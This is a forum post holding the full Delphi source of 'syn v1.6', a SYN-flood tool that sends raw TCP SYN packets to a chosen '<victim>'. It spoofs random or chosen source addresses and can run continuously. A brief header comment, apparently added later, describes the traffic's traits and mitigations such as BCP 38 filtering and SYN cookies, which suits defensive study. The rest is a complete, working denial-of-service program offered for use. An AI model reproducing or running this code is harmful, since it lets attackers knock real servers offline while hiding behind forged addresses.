// Forum post by Gonzalez, September 29, 2009.
//
// Console program (banner: "syn v1.6 [14 Aug 2003]") that hand-builds 40-byte
// IPv4 + TCP packets with only the SYN flag set and sends them to one target
// through a raw socket, i.e. a SYN-flood traffic generator.
//
// Properties of the emitted traffic that are visible in this listing and
// useful for detection and filtering:
//   * The source address is either the -S value or, by default, rebuilt for
//     every packet from four independently randomised octets. Nothing here
//     excludes reserved, private or multicast ranges, so source-address
//     validation at the network edge (BCP 38 / RFC 2827) and bogon filtering
//     apply to this traffic.
//   * Every packet is written with TTL 255, total length 40 (no TCP options),
//     a randomised window, and randomised acknowledgement-number and
//     urgent-pointer fields although only SYN is set.
//   * On the receiving side, SYN cookies and SYN rate limiting are the usual
//     mitigations for this traffic class.
//   * The program's own error text says it only works on Windows XP;
//     Microsoft documents that XP SP2 and later client releases restrict
//     sending TCP data over raw sockets.
program syn;

{$APPTYPE CONSOLE}

uses
  Windows, Winsock;

const
  Banner = #13#10'syn v1.6 [14 Aug 2003]'#13#10#13#10 +
           'http://www.loranbase.com'#13#10;

type
  TPorts = array of Word;

  // Run-time settings, filled from defaults and then from the command line.
  TSynOptions = packed record
    Delay: Cardinal;        // -d: pause in ms after each packet (0 = none)
    DstPorts: TPorts;       // -p: destination ports; an entry of 0 means random
    SockAddr: TSockAddrIn;  // destination address handed to Sendto
    Num: Cardinal;          // -n: value the pass counter is compared against
    RandomSeek: Integer;    // extra state mixed into GetRandomValue
    Sended: Cardinal;       // completed passes over the port lists
    Socket: TSocket;        // raw socket created by CreateSocket
    SpoofIP: Cardinal;      // -S: fixed source address; 0 = random per packet
    SrcPorts: TPorts;       // -s: source ports; an entry of 0 means random
  end;

  // Lets a buffer be read as a sequence of 16-bit words (used by CheckSum).
  WordArray = ^TWordArray;
  TWordArray = array [0..0] of Word;

  // 20-byte IPv4 header without options.
  PIPhdr = ^TIPhdr;
  TIPhdr = packed record
    ip_verlen: Byte;
    ip_tos: Byte;
    ip_len: Word;
    ip_id: Word;
    ip_off: Word;
    ip_ttl: Byte;
    ip_p: Byte;
    ip_sum: Word;
    ip_src: Cardinal;
    ip_dst: Cardinal;
  end;

  // 20-byte TCP header without options.
  PTCPhdr = ^TTCPhdr;
  TTCPhdr = packed record
    tcp_src : Word;
    tcp_dst : Word;
    tcp_seq : Cardinal;
    tcp_ack : Cardinal;
    tcp_off : Byte;
    tcp_flags : Byte;
    tcp_win : Word;
    tcp_sum : Word;
    tcp_urp : Word;
  end;

  // 12-byte TCP pseudo header followed by a copy of the TCP header (32 bytes
  // in total); only used as input to the TCP checksum.
  Ppseudohdr_tcp = ^Tpseudohdr_tcp;
  Tpseudohdr_tcp = packed record
    saddr : Cardinal;
    daddr : Cardinal;
    zero : Byte;
    protocol : Byte;
    length : Word;
    tcphdr : TTCPhdr;
  end;

const
  Len = 40;  // packet size: 20-byte IP header + 20-byte TCP header

var
  Buf: array [0..(Len - 1)] of Char;  // the one packet buffer, reused for every send
  IPhdr: PIPhdr = @Buf[0];            // IP header view at offset 0 of Buf
  TCPhdr: PTCPhdr = @Buf[20];         // TCP header view at offset 20 of Buf
  WSAData: TWSAData;
  i, j: integer;
  UseDelay: Boolean;
  SynOpt: TSynOptions;
  LastUpdate: Cardinal = 0;           // tick count of the last console-title refresh

// Returns True when Force is set or at least DelayValue ms have elapsed since
// the last True result, and records the current tick count in that case.
function CanUpdate(const DelayValue: Cardinal; const Force: Boolean): Boolean;
begin
  Result := Force or ((GetTickCount - LastUpdate) >= DelayValue);
  if Result then
    LastUpdate := GetTickCount;
end;

// Converts S to an integer with Val; the error position E is not inspected.
function StrtoInt(const S: string): integer;
var
  E: integer;
begin
  Val(S, Result, E);
end;

// Converts Value to its decimal string form via an 11-character short string.
function InttoStr(const Value: integer): string;
var
  S: string[11];
begin
  Str(Value, S);
  Result := S;
end;

// Converts S to an integer, returning Default when Val reports an error.
function StrToIntDef(const S: string; Default: integer): integer;
var
  E: integer;
begin
  Val(S, Result, E);
  if E <> 0 then
    Result := Default;
end;

// Returns the part of Path after its last '\' or '/'.
// Result is only assigned when a separator is found.
function ExtractFileName(const Path: string): string;
var
  i, L: integer;
  Ch: Char;
begin
  L := Length(Path);
  for i := L downto 1 do
  begin
    Ch := Path[i];
    if (Ch = '\') or (Ch = '/') then
    begin
      Result := Copy(Path, i + 1, L - i);
      Break;
    end;
  end;
end;

// Sums the buffer as 16-bit words, folds the carries back into the low
// 16 bits and returns the bitwise complement (the form used for the IP and
// TCP header checksums below). size is in bytes; the callers in this file
// pass 20 and 32.
function CheckSum(data: WordArray; size: Integer): Word;
var
  i, sum: Integer;
begin
  sum := 0;
  i := 0;
  while size > 1 do
  begin
    Inc(sum, data^[i]);
    Dec(size, 2);
    Inc(i);
  end;
  // Odd trailing byte: a full word is added here, not a single byte.
  if size <> 0 then
    Inc(sum, data^[i]);
  sum := (sum shr 16) + (sum and $ffff);
  Inc(sum, sum shr 16);
  Result := not sum;
end;

// True when Port parses as an integer in 0..65535.
function ValidPort(const Port: string): Boolean;
var
  prt: Integer;
begin
  prt := StrtoIntDef(Port, -1);  // -1 marks text that is not a number
  Result := (prt > -1) and (prt < 65536); // exclusive bounds: accepts 0..65535
end;

// Parses a comma-separated port list into a TPorts array. Entries rejected
// by ValidPort are reported on the console and skipped.
function GetPorts(Ports: string): TPorts;

  // Appends Port to the enclosing function's Result when it is valid.
  procedure AddPort(const Port: string);
  begin
    if ValidPort(Port) then
    begin
      SetLength(Result, Length(Result) + 1);
      Result[High(Result)] := StrtoInt(Port);
    end
    else
      Writeln('Skipping invalid port: ' + Port);
  end;

var
  i: Integer;
  S: string;
begin
  i := Pos(',', Ports);
  while i > 0 do
  begin
    S := Copy(Ports, 1, i - 1);
    AddPort(S);
    Delete(Ports, 1, i);  // drop the consumed entry together with its comma
    i := Pos(',', Ports);
  end;
  AddPort(Ports);  // whatever remains after the last comma
end;

// Returns a pseudo-random value reduced modulo Range. SynOpt.RandomSeek is
// changed on every call and xor-ed into the Random output so that calls made
// within a very short time still differ (per the original author's comment).
function GetRandomValue(const Range: Integer): Integer;
begin
  SynOpt.RandomSeek := (SynOpt.RandomSeek xor Range) + 1;
  Result := (Random(High(Integer)) xor SynOpt.RandomSeek) mod Range;
end;

// Builds a 32-bit address from four octets, each GetRandomValue(255) + 1.
// No address range is excluded here.
function GetRandomIP: Cardinal;
var
  IPArray: array [0..3] of Byte;
  i: Integer;
begin
  for i := 0 to 3 do
    IPArray[i] := GetRandomValue(255) + 1;
  Move(IPArray, Result, Sizeof(Result));
end;

// Resolves host to a 32-bit IPv4 address: dotted notation is tried first,
// then a name lookup. Prints an error and halts when the lookup fails.
function Resolve(const host: PChar): Cardinal;
var
  InAddr: TInAddr;
  HostEnt: PHostEnt;
begin
  InAddr.S_addr := inet_addr(host); // convert dotted notation (ex: 127.0.0.1) to a cardinal
  if InAddr.S_addr = INADDR_NONE then // not a dotted address, so look the name up
  begin
    HostEnt := GetHostByName(host);
    if not Assigned(HostEnt) then // the name could not be resolved: exit
    begin
      Writeln('Error: Unable to resolve host: ' + host);
      Halt(0);
    end;
    // Take the first address of the returned list.
    Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length);
  end;
  Result := InAddr.S_addr;
end;

// Opens the raw socket (AF_INET, SOCK_RAW, IPPROTO_RAW) and sets option 2 at
// level IPPROTO_IP, which the original comment identifies as IP_HDRINCL: the
// caller supplies the IP header itself. Either failure prints a message and
// halts.
procedure CreateSocket;
begin
  SynOpt.Socket := Socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if SynOpt.Socket = INVALID_SOCKET then
  begin
    Writeln('Error on creating socket');
    Halt(0);
  end;
  if SetSockOpt(SynOpt.Socket, IPPROTO_IP, 2, '1', 4) <> 0 then
  begin // the IP_HDRINCL option could not be set: exit
    Writeln('Error: IP_HDRINCL'#13#10 +
            '(Note that this program only works on Windows XP)');
    Halt(0);
  end;
end;

var
  SeudoBuf: array [0..31] of Char;  // scratch space for the 32-byte pseudo header

// Builds one IP + TCP packet in Buf and sends it to SynOpt.SockAddr.
// sport / dport: source and destination port; 0 selects a random value.
// The return value of Sendto is discarded.
procedure SendSyn(const sport, dport: Word);

  // Fills the 20-byte IP header at the start of Buf.
  procedure SendSyn_FillIPhdr;
  begin
    IPhdr.ip_verlen := $45;
    IPhdr.ip_tos := 0;
    IPhdr.ip_len := htons(Len);
    IPhdr.ip_id := GetRandomValue(High(Word)) + 1;
    IPhdr.ip_ttl := 255;
    IPhdr.ip_p := 6; // 6 = TCP
    // Source address: fixed -S value if one was given, otherwise a new
    // random address for every packet.
    if SynOpt.SpoofIP = 0 then
      IPhdr.ip_src := GetRandomIP
    else
      IPhdr.ip_src := SynOpt.SpoofIP;
    IPhdr.ip_dst := SynOpt.SockAddr.sin_addr.S_addr;
    // ip_sum is still zero here because SendSyn cleared Buf beforehand.
    IPhdr.ip_sum := CheckSum(@IPhdr^, 20);
  end;

  // Fills the TCP header at offset 20 of Buf and computes its checksum over
  // the pseudo header built in SeudoBuf.
  procedure SendSyn_FillTCPhdr;
  var
    PSeudohdr: Ppseudohdr_tcp;
  begin
    if sport = 0 then
      TCPhdr.tcp_src := GetRandomValue(High(Word)) + 1
    else
      TCPhdr.tcp_src := htons(sport);
    if dport = 0 then
      TCPhdr.tcp_dst := GetRandomValue(High(Word)) + 1
    else
      TCPhdr.tcp_dst := htons(dport);
    TCPhdr.tcp_seq := GetRandomValue(High(Integer)) + 1;
    TCPhdr.tcp_ack := GetRandomValue(High(Integer)) + 1;
    TCPhdr.tcp_flags := $02; // 0x02 = syn flag
    TCPhdr.tcp_win := GetRandomValue(High(Word)) + 1;
    TCPhdr.tcp_urp := GetRandomValue(High(Word)) + 1;
    FillChar(SeudoBuf, Sizeof(SeudoBuf), 0);
    // The TCP checksum is computed over a pseudo header (source address,
    // destination address, protocol, TCP length) followed by the TCP header.
    PSeudohdr := Ppseudohdr_tcp(@SeudoBuf);
    PSeudohdr.saddr := IPhdr.ip_src;
    PSeudohdr.daddr := IPhdr.ip_dst;
    PSeudohdr.protocol := 6;
    PSeudohdr.length := htons(20);
    PSeudohdr.tcphdr := TCPhdr^;
    TCPhdr.tcp_sum := CheckSum(@PSeudohdr^, 32);
  end;

begin
  FillChar(Buf, Len, 0);  // every field not assigned below stays zero
  SendSyn_FillIPhdr;      // must run first: the TCP checksum reads ip_src / ip_dst
  SendSyn_FillTCPhdr;
  Sendto(SynOpt.Socket, Buf, Len, 0, SynOpt.SockAddr, Sizeof(SynOpt.SockAddr));
end;

// Sets the target from the first command-line argument and the defaults:
// one destination port and one source port entry, both 0 (random).
procedure SetDefaultOptions;
begin
  SynOpt.SockAddr.sin_addr.S_addr := Resolve(PChar(ParamStr(1)));
  SetLength(SynOpt.DstPorts, 1);
  SynOpt.DstPorts[0] := 0;
  SynOpt.SockAddr.sin_family := AF_INET;
  SynOpt.SockAddr.sin_port := GetRandomValue(High(Word)) + 1;
  SetLength(SynOpt.SrcPorts, 1);
  SynOpt.SrcPorts[0] := 0;
end;

// Applies the command-line options that follow the target. Only arguments of
// exactly two characters starting with '-' are treated as options; each one
// takes its value from ParamStr(i + 1), which is read without checking that
// the argument exists.
procedure SetParams;
var
  i, pcount: Integer;
  pstr: string;
  Ch: Char;
begin
  pcount := ParamCount;
  for i := 2 to pcount do
  begin
    pstr := ParamStr(i);
    Ch := #0;
    if Length(pstr) = 2 then
    begin
      if pstr[1] = '-' then
        Ch := pstr[2];
    end;
    if Ch = #0 then
      Continue;  // not an option switch (for example an option's value)
    case Ch of
      'S': SynOpt.SpoofIP := Resolve(PChar(ParamStr(i + 1)));
      'p': begin
             SynOpt.DstPorts := GetPorts(ParamStr(i + 1));
             if Length(SynOpt.DstPorts) = 0 then
             begin
               Writeln('No valid ports found on the dst port list');
               Halt(0);
             end;
           end;
      's': begin
             SynOpt.SrcPorts := GetPorts(ParamStr(i + 1));
             if Length(SynOpt.SrcPorts) = 0 then
             begin
               Writeln('No valid ports found on the src port list');
               Halt(0);
             end;
           end;
      // Text that is not a number falls back to 0 for both options below.
      'n': SynOpt.Num := StrtoIntDef(ParamStr(i + 1), 0);
      'd': SynOpt.Delay := StrtoIntDef(ParamStr(i + 1), 0);
    end;
  end;
end;

// Prints the command-line help and halts.
procedure Usage(const Path: string);
begin
  Write(
    'usage: ' + Path + ' <victim> [options]'#13#10#13#10 +
    'Options:'#13#10 +
    ' -S: Spoof host (0 is random (default))'#13#10 +
    ' -p: Comma separated list of dest ports (0 is random (default))'#13#10 +
    ' -s: Comma separated list of src ports (0 is random (default))'#13#10 +
    ' -n: Num of packets (0 is continuous (default))'#13#10 +
    ' -d: Delay (in ms) (default 0)'#13#10
  );
  Halt(0);
end;

begin
  Writeln(Banner);
  if ParamCount < 1 then
    Usage(ExtractFileName(ParamStr(0)));
  WSAStartUp($0101, WSAData);  // requests Winsock 1.1; the result is not checked
  FillChar(SynOpt, Sizeof(SynOpt), 0);
  CreateSocket;
  try
    Randomize;
    SetDefaultOptions;
    if ParamCount > 1 then
      SetParams;
    UseDelay := SynOpt.Delay > 0;
    repeat
      // One pass: a packet for every destination-port / source-port pair.
      for i := 0 to High(SynOpt.DstPorts) do
      begin
        for j := 0 to High(SynOpt.SrcPorts) do
        begin
          SendSyn(SynOpt.SrcPorts[j], SynOpt.DstPorts[i]);
          if UseDelay then
            Sleep(SynOpt.Delay);
        end;
      end;
      // Sended counts completed passes, not individual packets.
      Inc(SynOpt.Sended);
      // Refresh the console title at most every 50 ms, and on the final pass.
      if CanUpdate(50, SynOpt.Sended = SynOpt.Num) then
        SetConsoleTitle(PChar('Count: ' + InttoStr(SynOpt.Sended)));
    // With Num left at 0 this is not met after the first increment, which is
    // what the usage text calls "continuous".
    until SynOpt.Sended = SynOpt.Num;
  finally
    CloseSocket(SynOpt.Socket);
    WSACleanUp;
  end;
end.
Fitty Posted September 29, 2009
frumos